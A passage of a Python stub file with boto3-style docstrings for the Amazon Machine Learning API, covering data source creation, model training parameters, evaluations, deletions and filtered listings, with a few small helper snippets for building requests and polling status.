{ 'fieldName': 'F1', 'fieldType': 'TEXT' }, { 'fieldName': 'F2', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F3', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F4', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F5', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F6', 'fieldType': 'TEXT' }, { 'fieldName': 'F7', 'fieldType': 'WEIGHTED_INT_SEQUENCE' }, { 'fieldName': 'F8', 'fieldType': 'WEIGHTED_STRING_SEQUENCE' } ],
'excludedVariableNames': [ 'F6' ] }
DataSchemaUri (string) --Describes the schema location for an Amazon Redshift DataSource .
:type RoleARN: string
:param RoleARN: [REQUIRED]
A fully specified role Amazon Resource Name (ARN). Amazon ML assumes the role on behalf of the user to create the following:
A security group to allow Amazon ML to execute the SelectSqlQuery query on an Amazon Redshift cluster
An Amazon S3 bucket policy to grant Amazon ML read/write permissions on the S3StagingLocation
:type ComputeStatistics: boolean
:param ComputeStatistics: The compute statistics for a DataSource . The statistics are generated from the observation data referenced by a DataSource . Amazon ML uses the statistics internally during MLModel training. This parameter must be set to true if the DataSource needs to be used for MLModel training.
:rtype: dict
:return: {
'DataSourceId': 'string'
}
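As a sketch (every identifier below is a placeholder, not a real resource), the DataSpec argument for this call can be assembled as a plain dict before invoking the client:

```python
def redshift_data_spec(cluster_id, database, query, staging_s3,
                       username, password, schema_uri=None):
    # Assemble the DataSpec dict for create_data_source_from_redshift.
    # All required fields are always present; DataSchemaUri is optional
    # (omit it if you pass an inline DataSchema instead).
    spec = {
        "DatabaseInformation": {
            "DatabaseName": database,
            "ClusterIdentifier": cluster_id,
        },
        "SelectSqlQuery": query,
        "DatabaseCredentials": {"Username": username, "Password": password},
        "S3StagingLocation": staging_s3,
    }
    if schema_uri is not None:
        spec["DataSchemaUri"] = schema_uri
    return spec

spec = redshift_data_spec("my-cluster", "dev", "SELECT * FROM observations",
                          "s3://my-bucket/staging/", "ml_user", "secret")
# The dict is then passed as DataSpec=spec, together with DataSourceId,
# RoleARN, and ComputeStatistics, to create_data_source_from_redshift.
```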
"""
pass
def create_data_source_from_s3(DataSourceId=None, DataSourceName=None, DataSpec=None, ComputeStatistics=None):
"""
Creates a DataSource object. A DataSource references data that can be used to perform CreateMLModel , CreateEvaluation , or CreateBatchPrediction operations.
CreateDataSourceFromS3 is an asynchronous operation. In response to CreateDataSourceFromS3 , Amazon Machine Learning (Amazon ML) immediately returns and sets the DataSource status to PENDING . After the DataSource has been created and is ready for use, Amazon ML sets the Status parameter to COMPLETED . DataSource in the COMPLETED or PENDING state can be used to perform only CreateMLModel , CreateEvaluation or CreateBatchPrediction operations.
If Amazon ML can't accept the input source, it sets the Status parameter to FAILED and includes an error message in the Message attribute of the GetDataSource operation response.
The observation data used in a DataSource should be ready to use; that is, it should have a consistent structure, and missing data values should be kept to a minimum. The observation data must reside in one or more .csv files in an Amazon Simple Storage Service (Amazon S3) location, along with a schema that describes the data items by name and type. The same schema must be used for all of the data files referenced by the DataSource .
After the DataSource has been created, it's ready to use in evaluations and batch predictions. If you plan to use the DataSource to train an MLModel , the DataSource also needs a recipe. A recipe describes how each input variable will be used in training an MLModel . Will the variable be included or excluded from training? Will the variable be manipulated; for example, will it be combined with another variable or will it be split apart into word combinations? The recipe provides answers to these questions.
See also: AWS API Documentation
:example: response = client.create_data_source_from_s3(
DataSourceId='string',
DataSourceName='string',
DataSpec={
'DataLocationS3': 'string',
'DataRearrangement': 'string',
'DataSchema': 'string',
'DataSchemaLocationS3': 'string'
},
ComputeStatistics=True|False
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
A user-supplied identifier that uniquely identifies the DataSource .
:type DataSourceName: string
:param DataSourceName: A user-supplied name or description of the DataSource .
:type DataSpec: dict
:param DataSpec: [REQUIRED]
The data specification of a DataSource :
DataLocationS3 - The Amazon S3 location of the observation data.
DataSchemaLocationS3 - The Amazon S3 location of the DataSchema .
DataSchema - A JSON string representing the schema. This is not required if DataSchemaLocationS3 is specified.
DataRearrangement - A JSON string that represents the splitting and rearrangement requirements for the Datasource . Sample - '{\'splitting\':{\'percentBegin\':10,\'percentEnd\':60}}'
DataLocationS3 (string) -- [REQUIRED]The location of the data file(s) used by a DataSource . The URI specifies a data file or an Amazon Simple Storage Service (Amazon S3) directory or bucket containing data files.
DataRearrangement (string) --A JSON string that represents the splitting and rearrangement processing to be applied to a DataSource . If the DataRearrangement parameter is not provided, all of the input data is used to create the Datasource .
There are multiple parameters that control what data is used to create a datasource:
``percentBegin`` Use percentBegin to indicate the beginning of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``percentEnd`` Use percentEnd to indicate the end of the range of the data used to create the Datasource. If you do not include percentBegin and percentEnd , Amazon ML includes all of the data when creating the datasource.
``complement`` The complement parameter instructs Amazon ML to use the data that is not included in the range of percentBegin to percentEnd to create a datasource. The complement parameter is useful if you need to create complementary datasources for training and evaluation. To create a complementary datasource, use the same values for percentBegin and percentEnd , along with the complement parameter. For example, the following two datasources do not share any data, and can be used to train and evaluate a model. The first datasource has 25 percent of the data, and the second one has 75 percent of the data. Datasource for evaluation: {'splitting':{'percentBegin':0, 'percentEnd':25}} Datasource for training: {'splitting':{'percentBegin':0, 'percentEnd':25, 'complement':'true'}}
``strategy`` To change how Amazon ML splits the data for a datasource, use the strategy parameter. The default value for the strategy parameter is sequential , meaning that Amazon ML takes all of the data records between the percentBegin and percentEnd parameters for the datasource, in the order that the records appear in the input data. The following two DataRearrangement lines are examples of sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'sequential', 'complement':'true'}} To randomly split the input data into the proportions indicated by the percentBegin and percentEnd parameters, set the strategy parameter to random and provide a string that is used as the seed value for the random data splitting (for example, you can use the S3 path to your data as the random seed string). If you choose the random split strategy, Amazon ML assigns each row of data a pseudo-random number between 0 and 100, and then selects the rows that have an assigned number between percentBegin and percentEnd . Pseudo-random numbers are assigned using both the input seed string value and the byte offset as a seed, so changing the data results in a different split. Any existing ordering is preserved. The random splitting strategy ensures that variables in the training and evaluation data are distributed similarly. It is useful in the cases where the input data may have an implicit sort order, which would otherwise result in training and evaluation datasources containing non-similar data records. 
The following two DataRearrangement lines are examples of non-sequentially ordered training and evaluation datasources: Datasource for evaluation: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed':'s3://my_s3_path/bucket/file.csv'}} Datasource for training: {'splitting':{'percentBegin':70, 'percentEnd':100, 'strategy':'random', 'randomSeed':'s3://my_s3_path/bucket/file.csv', 'complement':'true'}}
DataSchema (string) --A JSON string that represents the schema for an Amazon S3 DataSource . The DataSchema defines the structure of the observation data in the data file(s) referenced in the DataSource .
You must provide either the DataSchema or the DataSchemaLocationS3 .
Define your DataSchema as a series of key-value pairs. attributes and excludedVariableNames have an array of key-value pairs for their value. Use the following format to define your DataSchema .
{ 'version': '1.0',
'recordAnnotationFieldName': 'F1',
'recordWeightFieldName': 'F2',
'targetFieldName': 'F3',
'dataFormat': 'CSV',
'dataFileContainsHeader': true,
'attributes': [
{ 'fieldName': 'F1', 'fieldType': 'TEXT' }, { 'fieldName': 'F2', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F3', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F4', 'fieldType': 'NUMERIC' }, { 'fieldName': 'F5', 'fieldType': 'CATEGORICAL' }, { 'fieldName': 'F6', 'fieldType': 'TEXT' }, { 'fieldName': 'F7', 'fieldType': 'WEIGHTED_INT_SEQUENCE' }, { 'fieldName': 'F8', 'fieldType': 'WEIGHTED_STRING_SEQUENCE' } ],
'excludedVariableNames': [ 'F6' ] }
DataSchemaLocationS3 (string) --Describes the schema location in Amazon S3. You must provide either the DataSchema or the DataSchemaLocationS3 .
:type ComputeStatistics: boolean
:param ComputeStatistics: The compute statistics for a DataSource . The statistics are generated from the observation data referenced by a DataSource . Amazon ML uses the statistics internally during MLModel training. This parameter must be set to true if the DataSource needs to be used for MLModel training.
:rtype: dict
:return: {
'DataSourceId': 'string'
}
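The DataSchema format shown above can also be generated programmatically. This sketch (field names F1-F3 are illustrative) builds the JSON string that goes in the DataSchema field of the S3 DataSpec:

```python
import json

def build_data_schema(fields, target, excluded=(), data_format="CSV",
                      contains_header=True):
    # fields: list of (fieldName, fieldType) pairs, e.g. ("F1", "TEXT").
    # Returns the schema as a JSON string, matching the documented layout.
    schema = {
        "version": "1.0",
        "targetFieldName": target,
        "dataFormat": data_format,
        "dataFileContainsHeader": contains_header,
        "attributes": [{"fieldName": n, "fieldType": t} for n, t in fields],
        "excludedVariableNames": list(excluded),
    }
    return json.dumps(schema)

schema_str = build_data_schema(
    [("F1", "TEXT"), ("F2", "NUMERIC"), ("F3", "CATEGORICAL")],
    target="F3", excluded=["F1"])
```

Remember that exactly one of DataSchema or DataSchemaLocationS3 must be provided.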
"""
pass
def create_evaluation(EvaluationId=None, EvaluationName=None, MLModelId=None, EvaluationDataSourceId=None):
"""
Creates a new Evaluation of an MLModel . An MLModel is evaluated on a set of observations associated with a DataSource . Like a DataSource for an MLModel , the DataSource for an Evaluation contains values for the Target Variable . The Evaluation compares the predicted result for each observation to the actual outcome and provides a summary so that you know how well the MLModel performs on the test data. Evaluation generates a relevant performance metric, such as BinaryAUC, RegressionRMSE, or MulticlassAvgFScore, based on the corresponding MLModelType : BINARY , REGRESSION , or MULTICLASS .
CreateEvaluation is an asynchronous operation. In response to CreateEvaluation , Amazon Machine Learning (Amazon ML) immediately returns and sets the evaluation status to PENDING . After the Evaluation is created and ready for use, Amazon ML sets the status to COMPLETED .
You can use the GetEvaluation operation to check progress of the evaluation during the creation operation.
See also: AWS API Documentation
:example: response = client.create_evaluation(
EvaluationId='string',
EvaluationName='string',
MLModelId='string',
EvaluationDataSourceId='string'
)
:type EvaluationId: string
:param EvaluationId: [REQUIRED]
A user-supplied ID that uniquely identifies the Evaluation .
:type EvaluationName: string
:param EvaluationName: A user-supplied name or description of the Evaluation .
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID of the MLModel to evaluate.
The schema used in creating the MLModel must match the schema of the DataSource used in the Evaluation .
:type EvaluationDataSourceId: string
:param EvaluationDataSourceId: [REQUIRED]
The ID of the DataSource for the evaluation. The schema of the DataSource must match the schema used to create the MLModel .
:rtype: dict
:return: {
'EvaluationId': 'string'
}
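Because CreateEvaluation, like the other create operations above, is asynchronous, callers typically poll the matching Get* operation until the resource reaches a terminal status. A minimal, library-agnostic sketch (the lambda in the comment is a hypothetical usage):

```python
import time

def wait_for_completion(fetch_status, delay=30, max_tries=40):
    # fetch_status: zero-argument callable returning the current Status string,
    # e.g. lambda: client.get_evaluation(EvaluationId='my-eval')['Status'].
    # Returns the terminal status, or raises TimeoutError if none is reached.
    for _ in range(max_tries):
        status = fetch_status()
        if status in ("COMPLETED", "FAILED", "DELETED"):
            return status
        time.sleep(delay)
    raise TimeoutError("resource did not reach a terminal state")
```

The same helper works for DataSource, MLModel, and BatchPrediction resources, since all share the PENDING/COMPLETED/FAILED lifecycle.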
"""
pass
def create_ml_model(MLModelId=None, MLModelName=None, MLModelType=None, Parameters=None, TrainingDataSourceId=None, Recipe=None, RecipeUri=None):
"""
Creates a new MLModel using the DataSource and the recipe as information sources.
An MLModel is nearly immutable. Users can update only the MLModelName and the ScoreThreshold in an MLModel without creating a new MLModel .
CreateMLModel is an asynchronous operation. In response to CreateMLModel , Amazon Machine Learning (Amazon ML) immediately returns and sets the MLModel status to PENDING . After the MLModel has been created and is ready for use, Amazon ML sets the status to COMPLETED .
You can use the GetMLModel operation to check the progress of the MLModel during the creation operation.
See also: AWS API Documentation
:example: response = client.create_ml_model(
MLModelId='string',
MLModelName='string',
MLModelType='REGRESSION'|'BINARY'|'MULTICLASS',
Parameters={
'string': 'string'
},
TrainingDataSourceId='string',
Recipe='string',
RecipeUri='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
A user-supplied ID that uniquely identifies the MLModel .
:type MLModelName: string
:param MLModelName: A user-supplied name or description of the MLModel .
:type MLModelType: string
:param MLModelType: [REQUIRED]
The category of supervised learning that this MLModel will address. Choose from the following types:
Choose REGRESSION if the MLModel will be used to predict a numeric value.
Choose BINARY if the MLModel result has two possible values.
Choose MULTICLASS if the MLModel result has a limited number of values.
For more information, see the Amazon Machine Learning Developer Guide .
:type Parameters: dict
:param Parameters: A list of the training parameters in the MLModel . The list is implemented as a map of key-value pairs.
The following is the current set of training parameters:
sgd.maxMLModelSizeInBytes - The maximum allowed size of the model. Depending on the input data, the size of the model might affect its performance. The value is an integer that ranges from 100000 to 2147483648 . The default value is 33554432 .
sgd.maxPasses - The number of times that the training process traverses the observations to build the MLModel . The value is an integer that ranges from 1 to 10000 . The default value is 10 .
sgd.shuffleType - Whether Amazon ML shuffles the training data. Shuffling the data improves a model's ability to find the optimal solution for a variety of data types. The valid values are auto and none . The default value is none . We strongly recommend that you shuffle your data.
sgd.l1RegularizationAmount - The coefficient regularization L1 norm. It controls overfitting the data by penalizing large coefficients. This tends to drive coefficients to zero, resulting in a sparse feature set. If you use this parameter, start by specifying a small value, such as 1.0E-08 . The value is a double that ranges from 0 to MAX_DOUBLE . The default is not to use L1 regularization. This parameter can't be used when L2 is specified. Use this parameter sparingly.
sgd.l2RegularizationAmount - The coefficient regularization L2 norm. It controls overfitting the data by penalizing large coefficients. This tends to drive coefficients to small, nonzero values. If you use this parameter, start by specifying a small value, such as 1.0E-08 . The value is a double that ranges from 0 to MAX_DOUBLE . The default is not to use L2 regularization. This parameter can't be used when L1 is specified. Use this parameter sparingly.
(string) --String type.
(string) --String type.
:type TrainingDataSourceId: string
:param TrainingDataSourceId: [REQUIRED]
The DataSource that points to the training data.
:type Recipe: string
:param Recipe: The data recipe for creating the MLModel . You must specify either the recipe or its URI. If you don't specify a recipe or its URI, Amazon ML creates a default.
:type RecipeUri: string
:param RecipeUri: The Amazon Simple Storage Service (Amazon S3) location and file name that contains the MLModel recipe. You must specify either the recipe or its URI. If you don't specify a recipe or its URI, Amazon ML creates a default.
:rtype: dict
:return: {
'MLModelId': 'string'
}
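Every value in the Parameters map must be a string, even the numeric ones. A small helper (hypothetical, using the documented defaults and ranges) can validate the settings before the call:

```python
def sgd_parameters(max_passes=10, shuffle_type="none",
                   l1=None, l2=None, max_model_bytes=33554432):
    # Build the Parameters map for create_ml_model. The API expects all
    # values as strings; ranges below follow the documented limits.
    if not 1 <= max_passes <= 10000:
        raise ValueError("sgd.maxPasses must be between 1 and 10000")
    if l1 is not None and l2 is not None:
        raise ValueError("L1 and L2 regularization cannot be combined")
    params = {
        "sgd.maxMLModelSizeInBytes": str(max_model_bytes),
        "sgd.maxPasses": str(max_passes),
        "sgd.shuffleType": shuffle_type,
    }
    if l1 is not None:
        params["sgd.l1RegularizationAmount"] = repr(l1)
    if l2 is not None:
        params["sgd.l2RegularizationAmount"] = repr(l2)
    return params
```

The resulting dict is passed directly as the Parameters argument of create_ml_model.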
"""
pass
def create_realtime_endpoint(MLModelId=None):
"""
Creates a real-time endpoint for the MLModel . The endpoint contains the URI of the MLModel ; that is, the location to send real-time prediction requests for the specified MLModel .
See also: AWS API Documentation
:example: response = client.create_realtime_endpoint(
MLModelId='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID assigned to the MLModel during creation.
:rtype: dict
:return: {
'MLModelId': 'string',
'RealtimeEndpointInfo': {
'PeakRequestsPerSecond': 123,
'CreatedAt': datetime(2015, 1, 1),
'EndpointUrl': 'string',
'EndpointStatus': 'NONE'|'READY'|'UPDATING'|'FAILED'
}
}
"""
pass
def delete_batch_prediction(BatchPredictionId=None):
"""
Assigns the DELETED status to a BatchPrediction , rendering it unusable.
After using the DeleteBatchPrediction operation, you can use the GetBatchPrediction operation to verify that the status of the BatchPrediction changed to DELETED.
Caution: The result of the DeleteBatchPrediction operation is irreversible.
See also: AWS API Documentation
:example: response = client.delete_batch_prediction(
BatchPredictionId='string'
)
:type BatchPredictionId: string
:param BatchPredictionId: [REQUIRED]
A user-supplied ID that uniquely identifies the BatchPrediction .
:rtype: dict
:return: {
'BatchPredictionId': 'string'
}
"""
pass
def delete_data_source(DataSourceId=None):
"""
Assigns the DELETED status to a DataSource , rendering it unusable.
After using the DeleteDataSource operation, you can use the GetDataSource operation to verify that the status of the DataSource changed to DELETED.
Caution: The results of the DeleteDataSource operation are irreversible.
See also: AWS API Documentation
:example: response = client.delete_data_source(
DataSourceId='string'
)
:type DataSourceId: string
:param DataSourceId: [REQUIRED]
A user-supplied ID that uniquely identifies the DataSource .
:rtype: dict
:return: {
'DataSourceId': 'string'
}
"""
pass
def delete_evaluation(EvaluationId=None):
"""
Assigns the DELETED status to an Evaluation , rendering it unusable.
After invoking the DeleteEvaluation operation, you can use the GetEvaluation operation to verify that the status of the Evaluation changed to DELETED .
The results of the DeleteEvaluation operation are irreversible.
See also: AWS API Documentation
:example: response = client.delete_evaluation(
EvaluationId='string'
)
:type EvaluationId: string
:param EvaluationId: [REQUIRED]
A user-supplied ID that uniquely identifies the Evaluation to delete.
:rtype: dict
:return: {
'EvaluationId': 'string'
}
"""
pass
def delete_ml_model(MLModelId=None):
"""
Assigns the DELETED status to an MLModel , rendering it unusable.
After using the DeleteMLModel operation, you can use the GetMLModel operation to verify that the status of the MLModel changed to DELETED.
Caution: The result of the DeleteMLModel operation is irreversible.
See also: AWS API Documentation
:example: response = client.delete_ml_model(
MLModelId='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
A user-supplied ID that uniquely identifies the MLModel .
:rtype: dict
:return: {
'MLModelId': 'string'
}
"""
pass
def delete_realtime_endpoint(MLModelId=None):
"""
Deletes a real time endpoint of an MLModel .
See also: AWS API Documentation
:example: response = client.delete_realtime_endpoint(
MLModelId='string'
)
:type MLModelId: string
:param MLModelId: [REQUIRED]
The ID assigned to the MLModel during creation.
:rtype: dict
:return: {
'MLModelId': 'string',
'RealtimeEndpointInfo': {
'PeakRequestsPerSecond': 123,
'CreatedAt': datetime(2015, 1, 1),
'EndpointUrl': 'string',
'EndpointStatus': 'NONE'|'READY'|'UPDATING'|'FAILED'
}
}
"""
pass
def delete_tags(TagKeys=None, ResourceId=None, ResourceType=None):
"""
Deletes the specified tags associated with an ML object. After this operation is complete, you can't recover deleted tags.
If you specify a tag that doesn't exist, Amazon ML ignores it.
See also: AWS API Documentation
:example: response = client.delete_tags(
TagKeys=[
'string',
],
ResourceId='string',
ResourceType='BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
)
:type TagKeys: list
:param TagKeys: [REQUIRED]
One or more tags to delete.
(string) --
:type ResourceId: string
:param ResourceId: [REQUIRED]
The ID of the tagged ML object. For example, exampleModelId .
:type ResourceType: string
:param ResourceType: [REQUIRED]
The type of the tagged ML object.
:rtype: dict
:return: {
'ResourceId': 'string',
'ResourceType': 'BatchPrediction'|'DataSource'|'Evaluation'|'MLModel'
}
"""
pass
def describe_batch_predictions(FilterVariable=None, EQ=None, GT=None, LT=None, GE=None, LE=None, NE=None, Prefix=None, SortOrder=None, NextToken=None, Limit=None):
"""
Returns a list of BatchPrediction operations that match the search criteria in the request.
See also: AWS API Documentation
:example: response = client.describe_batch_predictions(
FilterVariable='CreatedAt'|'LastUpdatedAt'|'Status'|'Name'|'IAMUser'|'MLModelId'|'DataSourceId'|'DataURI',
EQ='string',
GT='string',
LT='string',
GE='string',
LE='string',
NE='string',
Prefix='string',
SortOrder='asc'|'dsc',
NextToken='string',
Limit=123
)
:type FilterVariable: string
:param FilterVariable: Use one of the following variables to filter a list of BatchPrediction :
CreatedAt - Sets the search criteria to the BatchPrediction creation date.
Status - Sets the search criteria to the BatchPrediction status.
Name - Sets the search criteria to the contents of the BatchPrediction Name .
IAMUser - Sets the search criteria to the user account that invoked the BatchPrediction creation.
MLModelId - Sets the search criteria to the MLModel used in the BatchPrediction .
DataSourceId - Sets the search criteria to the DataSource used in the BatchPrediction .
DataURI - Sets the search criteria to the data file(s) used in the BatchPrediction . The URL can identify either a file or an Amazon Simple Storage Service (Amazon S3) bucket or directory.
:type EQ: string
:param EQ: The equal to operator. The BatchPrediction results will have FilterVariable values that exactly match the value specified with EQ .
:type GT: string
:param GT: The greater than operator. The BatchPrediction results will have FilterVariable values that are greater than the value specified with GT .
:type LT: string
:param LT: The less than operator. The BatchPrediction results will have FilterVariable values that are less than the value specified with LT .
:type GE: string
:param GE: The greater than or equal to operator. The BatchPrediction results will have FilterVariable values that are greater than or equal to the value specified with GE .
:type LE: string
:param LE: The less than or equal to operator. The BatchPrediction results will have FilterVariable values that are less than or equal to the value specified with LE .
:type NE: string
:param NE: The not equal to operator. The BatchPrediction results will have FilterVariable values not equal to the value specified with NE .
:type Prefix: string
:param Prefix: A string that is found at the beginning of a variable, such as Name or Id .
For example, a Batch Prediction operation could have the Name 2014-09-09-HolidayGiftMailer . To search for this BatchPrediction , select Name for the FilterVariable and any of the following strings for the Prefix :
2014-09
2014-09-09
2014-09-09-Holiday
:type SortOrder: string
:param SortOrder: A two-value parameter that determines the sequence of the resulting list of BatchPrediction .
asc - Arranges the list in ascending order (A-Z, 0-9).
dsc - Arranges the list in descending order (Z-A, 9-0).
Results are sorted by FilterVariable .
:type NextToken: string
:param NextToken: An ID of the page in the paginated results.
:type Limit: integer
:param Limit: The maximum number of BatchPrediction results to include in the result. The range of acceptable values is 1 through 100 . The default value is 100 .
:rtype: dict
:return: {
'Results': [
{
'BatchPredictionId': 'string',
'MLModelId': 'string',
'BatchPredictionDataSourceId': 'string',
'InputDataLocationS3': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'OutputUri': 'string',
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1),
'TotalRecordCount': 123,
'InvalidRecordCount': 123
},
],
'NextToken': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to generate predictions for a batch of observations.
INPROGRESS - The process is underway.
FAILED - The request to perform a batch prediction did not run to completion. It is not usable.
COMPLETED - The batch prediction process completed successfully.
DELETED - The BatchPrediction is marked as deleted. It is not usable.
"""
pass
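The NextToken / Limit pair documented above follows the standard AWS pagination pattern: keep reissuing the request with the returned NextToken until it is absent. A hedged sketch of the client-side loop, where fetch_page is a hypothetical stand-in for a call such as client.describe_batch_predictions:

```python
def collect_all_results(fetch_page):
    """Drain a NextToken-paginated API.

    fetch_page(token) must return a response dict shaped like the
    :return: blocks above ('Results' list plus optional 'NextToken').
    """
    results, token = [], None
    while True:
        page = fetch_page(token)
        results.extend(page.get('Results', []))
        token = page.get('NextToken')
        if not token:  # an absent or empty token marks the last page
            return results
```

The same loop applies to describe_data_sources, describe_evaluations, and describe_ml_models; in practice client.get_paginator gives you this behavior without hand-rolling it.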
def describe_data_sources(FilterVariable=None, EQ=None, GT=None, LT=None, GE=None, LE=None, NE=None, Prefix=None, SortOrder=None, NextToken=None, Limit=None):
"""
Returns a list of DataSource objects that match the search criteria in the request.
See also: AWS API Documentation
:example: response = client.describe_data_sources(
FilterVariable='CreatedAt'|'LastUpdatedAt'|'Status'|'Name'|'DataLocationS3'|'IAMUser',
EQ='string',
GT='string',
LT='string',
GE='string',
LE='string',
NE='string',
Prefix='string',
SortOrder='asc'|'dsc',
NextToken='string',
Limit=123
)
:type FilterVariable: string
:param FilterVariable: Use one of the following variables to filter a list of DataSource :
CreatedAt - Sets the search criteria to DataSource creation dates.
Status - Sets the search criteria to DataSource statuses.
Name - Sets the search criteria to the contents of DataSource Name .
DataUri - Sets the search criteria to the URI of data files used to create the DataSource . The URI can identify either a file or an Amazon Simple Storage Service (Amazon S3) bucket or directory.
IAMUser - Sets the search criteria to the user account that invoked the DataSource creation.
:type EQ: string
:param EQ: The equal to operator. The DataSource results will have FilterVariable values that exactly match the value specified with EQ .
:type GT: string
:param GT: The greater than operator. The DataSource results will have FilterVariable values that are greater than the value specified with GT .
:type LT: string
:param LT: The less than operator. The DataSource results will have FilterVariable values that are less than the value specified with LT .
:type GE: string
:param GE: The greater than or equal to operator. The DataSource results will have FilterVariable values that are greater than or equal to the value specified with GE .
:type LE: string
:param LE: The less than or equal to operator. The DataSource results will have FilterVariable values that are less than or equal to the value specified with LE .
:type NE: string
:param NE: The not equal to operator. The DataSource results will have FilterVariable values not equal to the value specified with NE .
:type Prefix: string
:param Prefix: A string that is found at the beginning of a variable, such as Name or Id .
For example, a DataSource could have the Name 2014-09-09-HolidayGiftMailer . To search for this DataSource , select Name for the FilterVariable and any of the following strings for the Prefix :
2014-09
2014-09-09
2014-09-09-Holiday
:type SortOrder: string
:param SortOrder: A two-value parameter that determines the sequence of the resulting list of DataSource .
asc - Arranges the list in ascending order (A-Z, 0-9).
dsc - Arranges the list in descending order (Z-A, 9-0).
Results are sorted by FilterVariable .
:type NextToken: string
:param NextToken: The ID of the page in the paginated results.
:type Limit: integer
:param Limit: The maximum number of DataSource to include in the result.
:rtype: dict
:return: {
'Results': [
{
'DataSourceId': 'string',
'DataLocationS3': 'string',
'DataRearrangement': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'DataSizeInBytes': 123,
'NumberOfFiles': 123,
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'Message': 'string',
'RedshiftMetadata': {
'RedshiftDatabase': {
'DatabaseName': 'string',
'ClusterIdentifier': 'string'
},
'DatabaseUserName': 'string',
'SelectSqlQuery': 'string'
},
'RDSMetadata': {
'Database': {
'InstanceIdentifier': 'string',
'DatabaseName': 'string'
},
'DatabaseUserName': 'string',
'SelectSqlQuery': 'string',
'ResourceRole': 'string',
'ServiceRole': 'string',
'DataPipelineId': 'string'
},
'RoleARN': 'string',
'ComputeStatistics': True|False,
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to create a DataSource .
INPROGRESS - The creation process is underway.
FAILED - The request to create a DataSource did not run to completion. It is not usable.
COMPLETED - The creation process completed successfully.
DELETED - The DataSource is marked as deleted. It is not usable.
"""
pass
def describe_evaluations(FilterVariable=None, EQ=None, GT=None, LT=None, GE=None, LE=None, NE=None, Prefix=None, SortOrder=None, NextToken=None, Limit=None):
"""
Returns a list of Evaluation objects that match the search criteria in the request.
See also: AWS API Documentation
:example: response = client.describe_evaluations(
FilterVariable='CreatedAt'|'LastUpdatedAt'|'Status'|'Name'|'IAMUser'|'MLModelId'|'DataSourceId'|'DataURI',
EQ='string',
GT='string',
LT='string',
GE='string',
LE='string',
NE='string',
Prefix='string',
SortOrder='asc'|'dsc',
NextToken='string',
Limit=123
)
:type FilterVariable: string
:param FilterVariable: Use one of the following variables to filter a list of Evaluation objects:
CreatedAt - Sets the search criteria to the Evaluation creation date.
Status - Sets the search criteria to the Evaluation status.
Name - Sets the search criteria to the contents of Evaluation Name .
IAMUser - Sets the search criteria to the user account that invoked an Evaluation .
MLModelId - Sets the search criteria to the MLModel that was evaluated.
DataSourceId - Sets the search criteria to the DataSource used in Evaluation .
DataUri - Sets the search criteria to the data file(s) used in Evaluation . The URL can identify either a file or an Amazon Simple Storage Service (Amazon S3) bucket or directory.
:type EQ: string
:param EQ: The equal to operator. The Evaluation results will have FilterVariable values that exactly match the value specified with EQ .
:type GT: string
:param GT: The greater than operator. The Evaluation results will have FilterVariable values that are greater than the value specified with GT .
:type LT: string
:param LT: The less than operator. The Evaluation results will have FilterVariable values that are less than the value specified with LT .
:type GE: string
:param GE: The greater than or equal to operator. The Evaluation results will have FilterVariable values that are greater than or equal to the value specified with GE .
:type LE: string
:param LE: The less than or equal to operator. The Evaluation results will have FilterVariable values that are less than or equal to the value specified with LE .
:type NE: string
:param NE: The not equal to operator. The Evaluation results will have FilterVariable values not equal to the value specified with NE .
:type Prefix: string
:param Prefix: A string that is found at the beginning of a variable, such as Name or Id .
For example, an Evaluation could have the Name 2014-09-09-HolidayGiftMailer . To search for this Evaluation , select Name for the FilterVariable and any of the following strings for the Prefix :
2014-09
2014-09-09
2014-09-09-Holiday
:type SortOrder: string
:param SortOrder: A two-value parameter that determines the sequence of the resulting list of Evaluation .
asc - Arranges the list in ascending order (A-Z, 0-9).
dsc - Arranges the list in descending order (Z-A, 9-0).
Results are sorted by FilterVariable .
:type NextToken: string
:param NextToken: The ID of the page in the paginated results.
:type Limit: integer
:param Limit: The maximum number of Evaluation to include in the result.
:rtype: dict
:return: {
'Results': [
{
'EvaluationId': 'string',
'MLModelId': 'string',
'EvaluationDataSourceId': 'string',
'InputDataLocationS3': 'string',
'CreatedByIamUser': 'string',
'CreatedAt': datetime(2015, 1, 1),
'LastUpdatedAt': datetime(2015, 1, 1),
'Name': 'string',
'Status': 'PENDING'|'INPROGRESS'|'FAILED'|'COMPLETED'|'DELETED',
'PerformanceMetrics': {
'Properties': {
'string': 'string'
}
},
'Message': 'string',
'ComputeTime': 123,
'FinishedAt': datetime(2015, 1, 1),
'StartedAt': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
:returns:
PENDING - Amazon Machine Learning (Amazon ML) submitted a request to evaluate an MLModel .
INPROGRESS - The evaluation is underway.
FAILED - The request to evaluate an MLModel did not run to completion. It is not usable.
